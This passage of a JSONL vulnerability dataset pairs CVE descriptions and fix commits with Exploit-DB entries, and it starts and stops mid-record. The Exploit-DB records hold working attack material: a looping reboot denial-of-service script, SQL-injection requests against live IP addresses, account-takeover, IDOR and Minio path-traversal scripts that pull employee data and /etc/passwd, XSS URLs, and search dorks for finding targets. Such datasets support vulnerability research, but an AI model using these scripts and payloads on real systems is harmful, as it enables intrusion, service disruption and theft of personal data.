`http://ex", "cve_id": "CVE-2022-35949", "source": "cvefixes", "timestamp": ""} {"id": "4ede8d32232c4594a12d", "text": "CVE: CVE-2022-35954\n\n[{'lang': 'en', 'value': 'The GitHub Actions ToolKit provides a set of packages to make creating actions easier. The `core.exportVariable` function uses a well known delimiter that attackers can use to break out of that specific variable and assign values to other arbitrary variables. Workflows that write untrusted values to the `GITHUB_ENV` file may cause the path or other environment variables to be modified without the intention of the workflow or action author. Users sho", "cve_id": "CVE-2022-35954", "source": "cvefixes", "timestamp": ""} {"id": "d306120dc163cb1e6969", "text": "CVE: CVE-2022-35978\n\n[{'lang': 'en', 'value': \"Minetest is a free open-source voxel game engine with easy modding and game creation. In **single player**, a mod can set a global setting that controls the Lua script loaded to display the main menu. The script is then loaded as soon as the game session is exited. The Lua environment the menu runs in is not sandboxed and can directly interfere with the user's system. There are currently no known workarounds.\"}]\n\nFix commit: Protect a few more setti", "cve_id": "CVE-2022-35978", "source": "cvefixes", "timestamp": ""} {"id": "a3ccefbcb84372a57151", "text": "CVE: CVE-2022-35980\n\n[{'lang': 'en', 'value': \"OpenSearch Security is a plugin for OpenSearch that offers encryption, authentication and authorization. Versions 2.0.0.0 and 2.1.0.0 of the security plugin are affected by an information disclosure vulnerability. Requests to an OpenSearch cluster configured with advanced access control features document level security (DLS), field level security (FLS), and/or field masking will not be filtered when the query's search pattern matches an aliased inde", "cve_id": "CVE-2022-35980", "source": "cvefixes", "timestamp": ""} {"id": "d9799ad84b997c975658", "text": "CVE: CVE-2022-36007\n\n[{'lang': 'en', 'value': 'Venice is a Clojure inspired sandboxed Lisp dialect with excellent Java interoperability. A partial path traversal issue exists within the functions `load-file` and `load-resource`. These functions can be limited to load files from a list of load paths. Assuming Venice has been configured with the load paths: `[ \"/Users/foo/resources\" ]` When passing **relative** paths to these two vulnerable functions everything is fine: `(load-resource \"test.png\")", "cve_id": "CVE-2022-36007", "source": "cvefixes", "timestamp": ""} {"id": "d8cc9317e974ddba14aa", "text": "CVE: CVE-2022-36008\n\n[{'lang': 'en', 'value': \"Frontier is Substrate's Ethereum compatibility layer. A security issue was discovered affecting parsing of the RPC result of the exit reason in case of EVM reversion. In release build, this would cause the exit reason being incorrectly parsed and returned by RPC. In debug build, this would cause an overflow panic. No action is needed unless you have a bridge node that needs to distinguish different reversion exit reasons and you used RPC for this. T", "cve_id": "CVE-2022-36008", "source": "cvefixes", "timestamp": ""} {"id": "952a542cc245cdea4eaf", "text": "CVE: CVE-2022-36009\n\n[{'lang': 'en', 'value': 'gomatrixserverlib is a Go library for matrix protocol federation. Dendrite is a Matrix homeserver written in Go, an alternative to Synapse. The power level parsing within gomatrixserverlib was failing to parse the `\"events_default\"` key of the `m.room.power_levels` event, defaulting the event default power level to zero in all cases. Power levels are the matrix terminology for user access level. In rooms where the `\"events_default\"` power level had ", "cve_id": "CVE-2022-36009", "source": "cvefixes", "timestamp": ""} {"id": "124008a14d1998e1e2ef", "text": "CVE: CVE-2022-36123\n\n[{'lang': 'en', 'value': 'The Linux kernel before 5.18.13 lacks a certain clear operation for the block starting symbol (.bss). This allows Xen PV guest OS users to cause a denial of service or gain privileges.'}]\n\nFix commit: Merge tag 'x86_urgent_for_v5.19_rc6' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/tip\n\nPull x86 fixes from Borislav Petkov:\n\n - Prepare for and clear .brk early in order to address XenPV guests\n failures where the hypervisor verifies page tab", "cve_id": "CVE-2022-36123", "source": "cvefixes", "timestamp": ""} {"id": "62727638f213b9017c4b", "text": "CVE: CVE-2022-36123\n\n[{'lang': 'en', 'value': 'The Linux kernel before 5.18.13 lacks a certain clear operation for the block starting symbol (.bss). This allows Xen PV guest OS users to cause a denial of service or gain privileges.'}]\n\nFix commit: x86/xen: Use clear_bss() for Xen PV guests\n\nInstead of clearing the bss area in assembly code, use the clear_bss()\nfunction.\n\nThis requires to pass the start_info address as parameter to\nxen_start_kernel() in order to avoid the xen_start_info being zer", "cve_id": "CVE-2022-36123", "source": "cvefixes", "timestamp": ""} {"id": "8fd40c3d5c4dfe3a24e9", "text": "CVE: CVE-2022-36446\n\n[{'lang': 'en', 'value': 'software/apt-lib.pl in Webmin before 1.997 lacks HTML escaping for a UI command.'}]\n\nFix commit: Command to show in the UI should not be escaped, but the actual command must be", "cve_id": "CVE-2022-36446", "source": "cvefixes", "timestamp": ""} {"id": "08fab36c9db3197f286c", "text": "CVE: CVE-2022-36752\n\n[{'lang': 'en', 'value': 'png2webp v1.0.4 was discovered to contain an out-of-bounds write via the function w2p. This vulnerability is exploitable via a crafted png file.'}]\n\nFix commit: v1.0.5: fix buffer overrun when reading bad WebPs", "cve_id": "CVE-2022-36752", "source": "cvefixes", "timestamp": ""} {"id": "a8dd6aa0292871c3c736", "text": "CVE: CVE-2022-36879\n\n[{'lang': 'en', 'value': 'An issue was discovered in the Linux kernel through 5.18.14. xfrm_expand_policies in net/xfrm/xfrm_policy.c can cause a refcount to be dropped twice.'}]\n\nFix commit: xfrm: xfrm_policy: fix a possible double xfrm_pols_put() in xfrm_bundle_lookup()\n\nxfrm_policy_lookup() will call xfrm_pol_hold_rcu() to get a refcount of\npols[0]. This refcount can be dropped in xfrm_expand_policies() when\nxfrm_expand_policies() return error. pols[0]'s refcount is balan", "cve_id": "CVE-2022-36879", "source": "cvefixes", "timestamp": ""} {"id": "ff017988cd7e88bd510b", "text": "CVE: CVE-2022-37451\n\n[{'lang': 'en', 'value': 'Exim before 4.96 has an invalid free in pam_converse in auths/call_pam.c because store_free is not used after store_malloc.'}]\n\nFix commit: Fix PAM auth. Bug 2813", "cve_id": "CVE-2022-37451", "source": "cvefixes", "timestamp": ""} {"id": "b366b45ad6a0757adccb", "text": "CVE: CVE-2022-37452\n\n[{'lang': 'en', 'value': 'Exim before 4.95 has a heap-based buffer overflow for the alias list in host_name_lookup in host.c when sender_host_name is set.'}]\n\nFix commit: Fix host_name_lookup (Close 2747)\n\nThanks to Nico R for providing a reproducing configuration.\n\n host_lookup = *\n message_size_limit = ${if def:sender_host_name {32M}{32M}}\n acl_smtp_connect = acl_smtp_connect\n acl_smtp_rcpt = acl_smtp_rcpt\n\n ", "cve_id": "CVE-2022-37452", "source": "cvefixes", "timestamp": ""} {"id": "3c9af787eb6bde55e6d7", "text": "FLEX 1080 < 1085 Web 1.6.0 - Denial of Service\n\n# Exploit Title: FLEX 1080 < 1085 Web 1.6.0 - Denial of Service\n# Date: 2023-05-06\n# Exploit Author: Mr Empy\n# Vendor Homepage: https://www.tem.ind.br/\n# Software Link: https://www.tem.ind.br/?page=prod-detalhe&id=94\n# Version: 1.6.0\n# Tested on: Android\n# CVE ID: CVE-2022-2591\n#!/usr/bin/env python3\nimport requests\nimport re\nimport argparse\nfrom colorama import Fore\nimport time\n\ndef main():\n def banner():\n print('''\n ________ _______ __\n / ____/ / / ____/ |/ /\n / /_ / / / __/ | /\n / __/ / /___/ /___ / |\n /_/ /_____/_____//_/|_|\n\n[FLEX 1080 < 1085 Web 1.6.0 - Denial of Service]\n\n''')\n def reboot():\n r = requests.get(f'http://{arguments.target}/sistema/flash/reboot')\n if 'Rebooting' in r.text:\n pass\n else:\n print(f'{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}O hardware\nnão é vulnerável')\n quit()\n\n banner()\n print(f'{Fore.LIGHTBLUE_EX}[*] {Fore.LIGHTWHITE_EX} Iniciando o ataque')\n while True:\n try:\n reboot()\n print(f'{Fore.LIGHTGREEN_EX}[+] {Fore.LIGHTWHITE_EX} Hardware\nderrubado com sucesso!')\n time.sleep(1)\n except:\n# print(f'{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}O hardware\nestá inativo')\n pass\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-t','--target', action='store', help='Target',\ndest='target', required=True)\n arguments = parser.parse_args()\n try:\n main()\n except KeyError:\n quit()", "cve_id": "CVE-2022-2591", "source": "exploitdb", "timestamp": "2023-05-13T00:00:00+00:00"} {"id": "f45a5e225e8880821305", "text": "ENTAB ERP 1.0 - Username PII leak\n\nExploit Title: ENTAB ERP 1.0 - Username PII leak\nDate: 17.05.2022\nExploit Author: Deb Prasad Banerjee\nVendor Homepage: https://www.entab.in\nVersion: Entab ERP 1.0\nTested on: Windows IIS\nCVE: CVE-2022-30076\n\nVulnerability Name: Broken Access control via Rate Limits\n\nDescription:\nIn the entab software in fapscampuscare.in, there is a login portal with a\nUserId field. An authenticated user would enter and get their name as well\nas other services. However, there should be a rate limit in place, which is\nnot present. As a result, a hacker could bypass the system and obtain other\nusernames via broken access control. This enables a threat actor to\nobain the complete full name and user ID of the person.\n\nPOC:\n1. Go to fapscampuscare.in or any entab hosted software and find the entab\nsoftware.\n2. Use a proxy to intercept the request.\n3. Since it's a student login, try a random UserId (e.g., s11111).\n4. Intercept the request using Burp Suite and send it to the Intruder.\n5. Select payloads from number 100000-20000, and turn off URL encoding on\nthe UserId parameter.\n6. Start the attack and sort by length to obtain the username and full name\nof other users.", "cve_id": "CVE-2022-30076", "source": "exploitdb", "timestamp": "2023-04-08T00:00:00+00:00"} {"id": "e97fe1fea5ed605ca6a3", "text": "EQ Enterprise management system v2.2.0 - SQL Injection\n\nExploit Title: EQ Enterprise management system v2.2.0 - SQL Injection\nDate: 2022.12.7\nExploit Author: TLF\nVendor Homepage: https://www.yiquantech.com/pc/about.html\nSoftware Link(漏洞影响应用下载链接): http://121.8.146.131/,http://183.233.152.14:9000/,http://219.135.168.90:9527/,http://222.77.5.250:9000/,http://219.135.168.90:9530/\nVersion: EQ v1.5.31 to v2.2.0\nTested on: windows 10\nCVE : CVE-2022-45297\n\n\nPOC:\nPOST /Account/Login HTTP/1.1\nHost: 121.8.146.131\nUser-Agent:Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\nContent-Length: 118\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nContent-Type: application/x-www-form-urlencoded;\ncharset=UTF-8 Cookie: ASP.NET_SessionId=tlipmh0zjgfdm5b4h1tgvolg\nOrigin: http://121.8.146.131\nReferer: http://121.8.146.131/Account/Login\nX-Requested-With: XMLHttpRequest\nAccept-Encoding: gzip\nRememberPwd=false&ServerDB=EQ%27and%28select%2B1%29%3E0waitfor%2F%2A%2A%2Fdelay%270%3A0%3A0&UserNumber=%27&UserPwd=%27", "cve_id": "CVE-2022-45297", "source": "exploitdb", "timestamp": "2023-03-31T00:00:00+00:00"} {"id": "968efe4430c8244f550b", "text": "Password Manager for IIS v2.0 - XSS\n\n# Exploit Title: Password Manager for IIS v2.0 - XSS\n# Exploit Author: VP4TR10T\n# Vendor Homepage: http://passwordmanager.adiscon.com/en/manual/\n# Software Link: http://passwordmanager.adiscon.com/\n\n# Version: *Version 2.0\n# Tested on: WINDOWS\n# CVE : CVE-2022-36664\n\n\nAffected URI (when changing user password):\nPOST /isapi/PasswordManager.dll HTTP/1.1\n\nAffected Parameter in http\npayload:*ReturnURL*=\n\n*Cordially,*", "cve_id": "CVE-2022-36664", "source": "exploitdb", "timestamp": "2023-03-25T00:00:00+00:00"} {"id": "bcb621eb0ed5867ae628", "text": "wkhtmltopdf 0.12.6 - Server Side Request Forgery\n\n# Exploit Title: wkhtmltopdf 0.12.6 - Server Side Request Forgery\n# Date: 20/8/2022\n# Exploit Author: Momen Eldawakhly (Cyber Guy)\n# Vendor Homepage: https://wkhtmltopdf.org\n# Software Link: https://wkhtmltopdf.org/downloads.html\n# Version: 0.12.6\n# Tested on: Windows ASP.NET \n\nPOST /PDF/FromHTML HTTP/1.1\nHost: vulnerable.com\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: \nDnt: 1\nUpgrade-Insecure-Requests: 1\nSec-Fetch-Dest: document\nSec-Fetch-Mode: navigate\nSec-Fetch-Site: same-origin\nSec-Fetch-User: ?1\nTe: trailers\nConnection: close\n\n__RequestVerificationToken=Token&header=....&data= ....", "cve_id": "CVE-2022-35583", "source": "exploitdb", "timestamp": "2023-03-23T00:00:00+00:00"} {"id": "c777c4b6c81f22327579", "text": "ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)\n\n# Exploit Title: ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)\n# Date: 9 October 2022\n# Exploit Author: Okan Kurtulus\n# Vendor Homepage: https://reqlogic.com\n# Version: 11.3\n# Tested on: Linux\n# CVE : 2022-41441\n\n# Proof of Concept:\n1- Install ReQlogic v11.3\n2- Go to https://localhost:81/ProcessWait.aspx?POBatch=test&WaitDuration=3\n3- XSS is triggered when you send the XSS payload to the POBatch and WaitDuration parameters.\n\n#XSS Payload:\n\n\n#Affected Prameters\nPOBatch\nWaitDuration\n\n#Final URLs\nhttp://localost:81/ProcessWait.aspx?POBatch=&WaitDuration=3\nhttp://localost:81/ProcessWait.aspx?POBatch=test&WaitDuration=", "cve_id": "CVE-2022-41441", "source": "exploitdb", "timestamp": "2023-03-28T00:00:00+00:00"} {"id": "bd0fb9ab629f5b6beaf5", "text": "Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated)\n\n# Exploit Title: Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated)\n# Shodan Dork:: inurl:\"https://www.shodan.io/search?query=smart+office\"\n# Date: 09/Dec/2022\n# Exploit Author: Tejas Nitin Pingulkar (https://cvewalkthrough.com/)\n# Vendor Homepage: https://smartofficepayroll.com/\n# Software Link: https://smartofficepayroll.com/downloads\n# Version: Smart Office Web 20.28 and before\n# CVE Number : CVE-2022-47075 and CVE-2022-47076\n# CVSS : 7.5 (High)\n# Reference : https://cvewalkthrough.com/smart-office-suite-cve-2022-47076-cve-2022-47075/\n# Vulnerability Description:\n# Smart Office Web 20.28 and before allows Remote Information Disclosure(Unauthenticated) via insecure direct object reference (IDOR). This was fixed in latter version except for ExportEmployeeDetails.\n\nimport wget\nimport os\nfrom colorama import Fore, Style\n\ndef download_file(url, filename):\n wget.download(url, filename)\n\n# Disclaimer\nprint(Fore.YELLOW + \"Disclaimer: This script is for educational purposes only.\")\nprint(\"The author takes no responsibility for any unauthorized usage.\")\nprint(\"Please use this script responsibly and adhere to the legal and ethical guidelines.\")\n\nagree = input(\"Do you agree to the disclaimer? (1 = Yes, 0 = No): \")\nif agree != \"1\":\n print(\"You have chosen not to agree. Exiting the script.\")\n exit()\n\n# Print name in red\nname = \"Exploit by Tejas Nitin Pingulkar\"\nprint(Fore.RED + name)\nprint(Style.RESET_ALL) # Reset color\n\nwebsite = input(\"Enter URL [https://1.1.1.1:1111 or http://1.1.1.1]: \")\ntarget_version = input(\"Is the target software version 20.28 or later? (1 = Yes, 0 = No): \")\nfolder_name = input(\"Enter the folder name to save the files: \")\n\n# Create the folder if it doesn't exist\nif not os.path.exists(folder_name):\n os.makedirs(folder_name)\n\nurls_filenames = []\n\nif target_version == \"1\":\n urls_filenames.append((website + \"/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeOtherDetails\", \"ExportEmployeeOtherDetails.csv\"))\nelse:\n urls_filenames.extend([\n (website + \"/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeDetails\", \"ExportEmployeeDetails.csv\"),\n (website + \"/DisplayParallelLogData.aspx\", \"DisplayParallelLogData.txt\"),\n (website + \"/ExportReportingManager.aspx\", \"ExportReportingManager.csv\"),\n (website + \"/ExportEmployeeLoginDetails.aspx\", \"ExportEmployeeLoginDetails.csv\")\n ])\n\nprint(\"CVE-2022-47076: Obtain user ID and password from downloaded source\")\n\nfor url, filename in urls_filenames:\n download_file(url, os.path.join(folder_name, filename))\n\n# Print \"for more such interesting exploits, visit cvewalkthrough.com\" in red\nprint(Fore.RED + \"\\nFor more such interesting exploits, visit cvewalkthrough.com\")\nprint(Style.RESET_ALL) # Reset color", "cve_id": "CVE-2022-47076", "source": "exploitdb", "timestamp": "2023-06-22T00:00:00+00:00"} {"id": "bd0fb9ab629f5b6beaf5", "text": "Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated)\n\n# Exploit Title: Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated)\n# Shodan Dork:: inurl:\"https://www.shodan.io/search?query=smart+office\"\n# Date: 09/Dec/2022\n# Exploit Author: Tejas Nitin Pingulkar (https://cvewalkthrough.com/)\n# Vendor Homepage: https://smartofficepayroll.com/\n# Software Link: https://smartofficepayroll.com/downloads\n# Version: Smart Office Web 20.28 and before\n# CVE Number : CVE-2022-47075 and CVE-2022-47076\n# CVSS : 7.5 (High)\n# Reference : https://cvewalkthrough.com/smart-office-suite-cve-2022-47076-cve-2022-47075/\n# Vulnerability Description:\n# Smart Office Web 20.28 and before allows Remote Information Disclosure(Unauthenticated) via insecure direct object reference (IDOR). This was fixed in latter version except for ExportEmployeeDetails.\n\nimport wget\nimport os\nfrom colorama import Fore, Style\n\ndef download_file(url, filename):\n wget.download(url, filename)\n\n# Disclaimer\nprint(Fore.YELLOW + \"Disclaimer: This script is for educational purposes only.\")\nprint(\"The author takes no responsibility for any unauthorized usage.\")\nprint(\"Please use this script responsibly and adhere to the legal and ethical guidelines.\")\n\nagree = input(\"Do you agree to the disclaimer? (1 = Yes, 0 = No): \")\nif agree != \"1\":\n print(\"You have chosen not to agree. Exiting the script.\")\n exit()\n\n# Print name in red\nname = \"Exploit by Tejas Nitin Pingulkar\"\nprint(Fore.RED + name)\nprint(Style.RESET_ALL) # Reset color\n\nwebsite = input(\"Enter URL [https://1.1.1.1:1111 or http://1.1.1.1]: \")\ntarget_version = input(\"Is the target software version 20.28 or later? (1 = Yes, 0 = No): \")\nfolder_name = input(\"Enter the folder name to save the files: \")\n\n# Create the folder if it doesn't exist\nif not os.path.exists(folder_name):\n os.makedirs(folder_name)\n\nurls_filenames = []\n\nif target_version == \"1\":\n urls_filenames.append((website + \"/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeOtherDetails\", \"ExportEmployeeOtherDetails.csv\"))\nelse:\n urls_filenames.extend([\n (website + \"/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeDetails\", \"ExportEmployeeDetails.csv\"),\n (website + \"/DisplayParallelLogData.aspx\", \"DisplayParallelLogData.txt\"),\n (website + \"/ExportReportingManager.aspx\", \"ExportReportingManager.csv\"),\n (website + \"/ExportEmployeeLoginDetails.aspx\", \"ExportEmployeeLoginDetails.csv\")\n ])\n\nprint(\"CVE-2022-47076: Obtain user ID and password from downloaded source\")\n\nfor url, filename in urls_filenames:\n download_file(url, os.path.join(folder_name, filename))\n\n# Print \"for more such interesting exploits, visit cvewalkthrough.com\" in red\nprint(Fore.RED + \"\\nFor more such interesting exploits, visit cvewalkthrough.com\")\nprint(Style.RESET_ALL) # Reset color", "cve_id": "CVE-2022-47075", "source": "exploitdb", "timestamp": "2023-06-22T00:00:00+00:00"} {"id": "a8fe65336d6fdb1c2d2c", "text": "LISTSERV 17 - Insecure Direct Object Reference (IDOR)\n\n# Exploit Title: LISTSERV 17 - Insecure Direct Object Reference (IDOR)\n# Google Dork: inurl:/scripts/wa.exe\n# Date: 12/02/2022\n# Exploit Author: Shaunt Der-Grigorian\n# Vendor Homepage: https://www.lsoft.com/\n# Software Link: https://www.lsoft.com/download/listserv.asp\n# Version: 17\n# Tested on: Windows Server 2019\n# CVE : CVE-2022-40319\n\n# Steps to replicate\n1. Create two accounts on your LISTSERV 17 installation, logging into each one in a different browser or container.\n2. Intercept your attacking profile's browser traffic using Burp.\n3. When logging in, you'll be taken to a URL with your email address in the Y parameter (i.e. http://example.com/scripts/wa.exe?INDEX&X=[session-id]&Y=[email-address]).\n4. Click on your email address on the top right and select \"Edit profile\".\n5. In Burp, change the email address in the URL's Y parameter to the email address of your victim account.\n4. Next, the \"WALOGIN\" cookie value will be an ASCII encoded version of your email address. Using Burp Decoder, ASCII encode your victim's email address and replace the \"WALOGIN\" cookie value with that.5. Submit this request. You should now be accessing/editing the victim's profile. You can make modifications and access any information in this profile as long as you replace those two values in Burp for each request.", "cve_id": "CVE-2022-40319", "source": "exploitdb", "timestamp": "2023-03-30T00:00:00+00:00"} {"id": "d34a9475d8301ed2730c", "text": "LISTSERV 17 - Reflected Cross Site Scripting (XSS)\n\n# Exploit Title: LISTSERV 17 - Reflected Cross Site Scripting (XSS)\n# Google Dork: inurl:/scripts/wa.exe\n# Date: 12/01/2022\n# Exploit Author: Shaunt Der-Grigorian\n# Vendor Homepage: https://www.lsoft.com/\n# Software Link: https://www.lsoft.com/download/listserv.asp\n# Version: 17\n# Tested on: Windows Server 2019\n# CVE : CVE-2022-39195\n\nA reflected cross-site scripting (XSS) vulnerability in the LISTSERV 17 web interface allows remote attackers to inject arbitrary JavaScript or HTML via the \"c\" parameter.\n\nTo reproduce, please visit\nhttp://localhost/scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(1)%3C/script%3E\n(or whichever URL you can use for testing instead of localhost).\n\nThe \"c\" parameter will reflect any value given onto the page.\n\n# Solution\nThis vulnerability can be mitigated by going under \"Server Administration\" to \"Web Templates\" and editing the BODY-LCMD-MESSAGE web template. Change &+CMD; to &+HTMLENCODE(&+CMD;); .", "cve_id": "CVE-2022-39195", "source": "exploitdb", "timestamp": "2023-03-30T00:00:00+00:00"} {"id": "22cb442a881e28184518", "text": "ZCBS/ZBBS/ZPBS v4.14k - Reflected Cross-Site Scripting (XSS)\n\n# Exploit Title: ZCBS/ZBBS/ZPBS v4.14k - Reflected Cross-Site Scripting (XSS)\n# Date: 2023-03-30\n# CVE: CVE-2023-26692\n# Exploit Author: Abdulaziz Saad (@b4zb0z)\n# Vendor Homepage: https://www.zcbs.nl\n# Version: 4.14k\n# Tested on: LAMP, Ubuntu\n# Google Dork: inurl:objecten.pl?ident=3D\n\n---\n\n[#] Vulnerability :\n\n`$_GET['ident']`\n\n\n[#] Exploitation :\n\n`https://localhost/cgi-bin/objecten.pl?ident=3D%3Cimg%20src=3Dx%20onerror=\n=3Dalert(%22XSS%22)%3E`", "cve_id": "CVE-2023-26692", "source": "exploitdb", "timestamp": "2023-04-08T00:00:00+00:00"} {"id": "102b4743353c913bd370", "text": "Answerdev 1.0.3 - Account Takeover\n\n# Exploit Title: Answerdev 1.0.3 - Account Takeover\n# Date: Reported on Jan 24th 2023\n# Exploit Author: Eduardo Pérez-Malumbres Cervera @blueudp\n# Vendor Homepage: https://answer.dev/\n# Software Link: https://github.com/answerdev/answer\n# Version: 1.0.3\n# Tested on: Ubuntu 22.04 / Debian 11\n# CVE : CVE-2023-0744\n\n\nfrom sys import argv\nimport urllib3\nfrom requests import post\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n\ndef ato(url: list, email: str) -> str:\n try:\n return f\"Your Link: {''.join(url)}users/password-reset?code=\" + \\\n post(f\"{''.join(url)}answer/api/v1/user/password/reset\", json={\"e_mail\": email}, verify=False).json()[\"data\"]\n except Exception as err:\n return f\"Cant reach URL: {err}\"\n\n\nif __name__ == \"__main__\":\n if len(argv) != 3:\n print(f\"Usage: {argv[0]} https://answer.domain/ myemail@localhost.com\")\n exit()\n\n print(ato([argv[1] if argv[1].endswith(\"/\") else argv[1] + \"/\"], str(argv[2])))", "cve_id": "CVE-2023-0744", "source": "exploitdb", "timestamp": "2023-04-05T00:00:00+00:00"} {"id": "3fce0c00255ea82ea641", "text": "Casdoor < v1.331.0 - '/api/set-password' CSRF\n\n# Exploit Title: Casdoor < v1.331.0 - '/api/set-password' CSRF\n# Application: Casdoor\n# Version: <= 1.331.0\n# Date: 03/07/2024\n# Exploit Author: Van Lam Nguyen\n# Vendor Homepage: https://casdoor.org/\n# Software Link: https://github.com/casdoor/casdoor\n# Tested on: Windows\n# CVE : CVE-2023-34927\n\nOverview\n==================================================\nCasdoor v1.331.0 and below was discovered to contain a Cross-Site Request Forgery (CSRF) in the endpoint /api/set-password.\nThis vulnerability allows attackers to arbitrarily change the victim user's password via supplying a crafted URL.\n\nProof of Concept\n==================================================\n\nMade an unauthorized request to /api/set-password that bypassed the old password entry authentication step\n\n\n
\n \n \n \n \n
\n\n\n\n\nIf a user is logged into the Casdoor Webapp at time of execution, a new user will be created in the app with the following credentials\n\nuserOwner: built-in\nuserName: admin\nnewPassword: hacked", "cve_id": "CVE-2023-34927", "source": "exploitdb", "timestamp": "2024-04-02T00:00:00+00:00"} {"id": "460827f9b032eda6bb04", "text": "Minio 2022-07-29T19-40-48Z - Path traversal\n\n# Exploit Title: Minio 2022-07-29T19-40-48Z - Path traversal\n# Date: 2023-09-02\n# Exploit Author: Jenson Zhao\n# Vendor Homepage: https://min.io/\n# Software Link: https://github.com/minio/minio/\n# Version: Up to (excluding) 2022-07-29T19-40-48Z\n# Tested on: Windows 10\n# CVE : CVE-2022-35919\n# Required before execution: pip install minio,requests\nimport urllib.parse\nimport requests, json, re, datetime, argparse\nfrom minio.credentials import Credentials\nfrom minio.signer import sign_v4_s3\n\n\nclass MyMinio():\n secure = False\n\n def __init__(self, base_url, access_key, secret_key):\n self.credits = Credentials(\n access_key=access_key,\n secret_key=secret_key\n )\n if base_url.startswith('http://') and base_url.endswith('/'):\n self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd'\n elif base_url.startswith('https://') and base_url.endswith('/'):\n self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd'\n self.secure = True\n else:\n print('Please enter a URL address that starts with \"http://\" or \"https://\" and ends with \"/\"\\n')\n\n def poc(self):\n datetimes = datetime.datetime.utcnow()\n datetime_str = datetimes.strftime('%Y%m%dT%H%M%SZ')\n urls = urllib.parse.urlparse(self.url)\n headers = {\n 'X-Amz-Content-Sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855',\n 'X-Amz-Date': datetime_str,\n 'Host': urls.netloc,\n }\n headers = sign_v4_s3(\n method='POST',\n url=urls,\n region='',\n headers=headers,\n credentials=self.credits,\n content_sha256='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855',\n date=datetimes,\n )\n if self.secure:\n response = requests.post(url=self.url, headers=headers, verify=False)\n else:\n response = requests.post(url=self.url, headers=headers)\n try:\n message = json.loads(response.text)['Message']\n pattern = r'(\\w+):(\\w+):(\\d+):(\\d+):(\\w+):(\\/[\\w\\/\\.-]+):(\\/[\\w\\/\\.-]+)'\n matches = re.findall(pattern, message)\n if matches:\n print('There is CVE-2022-35919 problem with the url!')\n print('The contents of the /etc/passwd file are as follows:')\n for match in matches:\n print(\"{}:{}:{}:{}:{}:{}:{}\".format(match[0], match[1], match[2], match[3], match[4], match[5],\n match[6]))\n else:\n print('There is no CVE-2022-35919 problem with the url!')\n print('Here is the response message content:')\n print(message)\n except Exception as e:\n print(\n 'It seems there was an issue with the requested response, which did not meet our expected criteria. Here is the response content:')\n print(response.text)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-u\", \"--url\", required=True, help=\"URL of the target. example: http://192.168.1.1:9088/\")\n parser.add_argument(\"-a\", \"--accesskey\", required=True, help=\"Minio AccessKey of the target. example: minioadmin\")\n parser.add_argument(\"-s\", \"--secretkey\", required=True, help=\"Minio SecretKey of the target. example: minioadmin\")\n args = parser.parse_args()\n minio = MyMinio(args.url, args.accesskey, args.secretkey)\n minio.poc()", "cve_id": "CVE-2022-35919", "source": "exploitdb", "timestamp": "2023-10-09T00:00:00+00:00"} {"id": "4bc96f60f317c6ea37a9", "text": "Pydio Cells 4.1.2 - Cross-Site Scripting (XSS) via File Download\n\nExploit Title: Pydio Cells 4.1.2 - Cross-Site Scripting (XSS) via File Download\nAffected Versions: 4.1.2 and earlier versions\nFixed Versions: 4.2.0, 4.1.3, 3.0.12\nVulnerability Type: Cross-Site Scripting\nSecurity Risk: high\nVendor URL: https://pydio.com/\nVendor Status: notified\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-004\nAdvisory Status: published\nCVE: CVE-2023-32751\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32751\n\n\nIntroduction\n============\n\n\"Pydio Cells is an open-core, self-hosted Document Sharing and\nCollaboration platform (DSC) specifically designed for organizations\nthat need advanced document sharing and collaboration without security\ntrade-offs or compliance issues.\"\n\n(from the vendor's homepage)\n\n\nMore Details\n============\n\nWhen a file named \"xss.html\" is downloaded in the Pydio Cells web application, a\ndownload URL similar to the following is generated:\n\nhttps://example.com/io/xss/xss.html\n ?AWSAccessKeyId=gateway\n &Expires=1682495748\n &Signature=920JV0Zy%2BrNYXjak7xksAxRpRp8%3D\n &response-content-disposition=attachment%3B%20filename%3Dxss.html\n &pydio_jwt=qIe9DUut-OicxRzNVlynMf6CTENB0J-J[...]\n\nThe URL is akin to a presigned URL as used by the Amazon S3 service. It\ncontains the URL parameter \"response-content-disposition\" which is set\nto \"attachment\" causing the response to contain a \"Content-Disposition\"\nheader with that value. Therefore, the browser downloads the file\ninstead of interpreting it. The URL also contains a signature and expiry\ntimestamp, which are checked by the backend. Unlike a presigned URL as used\nby S3, the URL also contains the parameter \"pydio_jwt\" with the JWT of\nthe user for authentication. Furthermore, the access key with the ID\n\"gateway\" is referenced, which can be found in the JavaScript sources of\nPydio Cells together with the secret:\n\n------------------------------------------------------------------------\n_awsSdk.default.config.update({\n accessKeyId: 'gateway',\n secretAccessKey: 